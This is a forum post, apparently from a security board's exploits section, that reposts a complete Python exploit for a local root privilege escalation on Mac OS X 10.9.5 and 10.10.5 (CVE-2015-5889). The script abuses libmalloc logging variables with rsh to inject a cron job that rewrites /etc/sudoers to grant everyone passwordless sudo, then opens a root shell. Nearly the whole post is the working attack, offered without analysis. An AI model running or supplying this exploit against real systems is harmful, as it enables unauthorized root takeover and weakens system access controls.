Jump to content
Nytro

Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation[/h]

# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel

import os,time,sys

env = {}

s = os.stat("/etc/sudoers").st_size

env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

sys.stderr.write("creating /etc/crontab..")

p = os.fork()
if p == 0:  
    os.close(1)
    os.close(2)
    os.execve("/usr/bin/rsh",["rsh","localhost"],env)

time.sleep(1)

if "NOPASSWD" not in open("/etc/crontab").read():
    sys.stderr.write("failed\n")
    sys.exit(-1)

sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")

while os.stat("/etc/sudoers").st_size == s:
    sys.stderr.write(".")   
    time.sleep(1)

sys.stderr.write("\ndone\n")

os.system("sudo su")

Sursa: https://www.exploit-db.com/exploits/38371/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...